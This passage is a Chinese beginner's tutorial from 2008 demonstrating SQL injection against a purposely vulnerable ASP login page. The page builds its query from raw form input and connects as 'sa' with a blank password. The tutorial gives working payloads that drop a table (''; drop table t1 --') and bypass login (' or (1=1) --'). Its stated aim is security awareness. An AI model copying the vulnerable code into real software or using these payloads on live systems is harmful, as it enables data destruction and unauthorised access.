菜鸟学SQL注入 一个简单的教学案例.docVIP

菜鸟学SQL注入 --- 一个简单的教学案例 2008-06-16 10:14:53 标签：SQL?案例?数据库?教学?休闲 版权声明：原创作品，如需转载，请与作者联系。否则将追究法律责任。 黑客的SQL渗透演示：指的是黑客或恶意用户在应用程序不知道的情况下通过应用程序来对SQL 数据库执行恶意的代码，一旦渗透成功，可以做任何事情，如查看数据表中的信息，删除数据表的数据，到获得网络访问权限等，我们在使用一些商用应用程序的时候，如一些第三方软件，会要求我们在他们的使用界面中输入一个用户名和口令，这个用户名和口令不是数据库中的用户名和口令，而是这些商用应用软件所定义的用户名和口令，通过这些用户名和口令来进行相应的操作。这种使用方法可以进行精细的安全控制。所以当前的应用软件中大多都使用这种方法。而我们这种SQL渗透会对这种方法进行攻击。我们在这里介绍的内容，主要是为了使用大家在以后的工作中加强安全意识 演示过程：我们要建立一个表来存放用户名和口令及访问级别 create table users (username varchar(10),password varchar(20), access int) insert into USERS? values (dufei,杜飞,1) 利用DW建一个登录页面详见文档： bodyform name=form1 method=post action=logined.asp? table width=75% border=1??? tr?????? td colspan=2div align=centerfont size=5strong用户登录/strong/font/div/td??? /tr??? tr?????? td height=21div align=right用户名：/div/td????? tdinput name=login_nm type=text id=login_nm/td??? /tr??? tr?????? tddiv align=right口令：/div/td????? tdinput name=login_pw type=text id=login_pw/td??? /tr??? tr?????? td colspan=2div align=center?????????? input type=submit name=Submit value=提交????????? nbsp;nbsp;nbsp;nbsp;?????????? input type=reset name=Submit2 value=重置??????? /div/td??? /tr? /table/form/body?%username=request.form(login_nm)password=request.form(login_pw)set conn=server.createobject(adodb.connection)conn.open uid=sa;pwd=;server=localhost;driver={sql server};database=itetsql=select * from logins where USERNAME=username and PASSWORD= password set rs=conn.execute(sql)if not rs.eof=true thenresponse.write(登录成功,你可以得到任何你所需要的数据)elseresponse.write(登录失败)end if% 黑客渗透的第一个例子：删除表建立一个测试表: create table t1 (name varchar(10)) 一会把它删除在用户名框中输入：’; drop table t1 –此时出现一个登录失败的提示，但让我们来看一下T1表是否还存在！已经消失在世界的尽头了！再也不会回来了此时为什么不成功，就是SQL渗透在起作用：我们来分析一下：从正常登录：输入：DUFEI??? 杜飞??? 1?? 到输入：’; drop table –分别是：?select * from logins where USERNAME=’u1’? and PASSWORD=’p1’;select * from logins where? USERNAME=’’; drop table t1 --? and PASSWORD=’p1’;因为空用户名是错误的，所以会报登录失败 第二个例子：模仿USERS中的第一个用户登录到我们的系统： or (1=1) --分析：相当于在SQL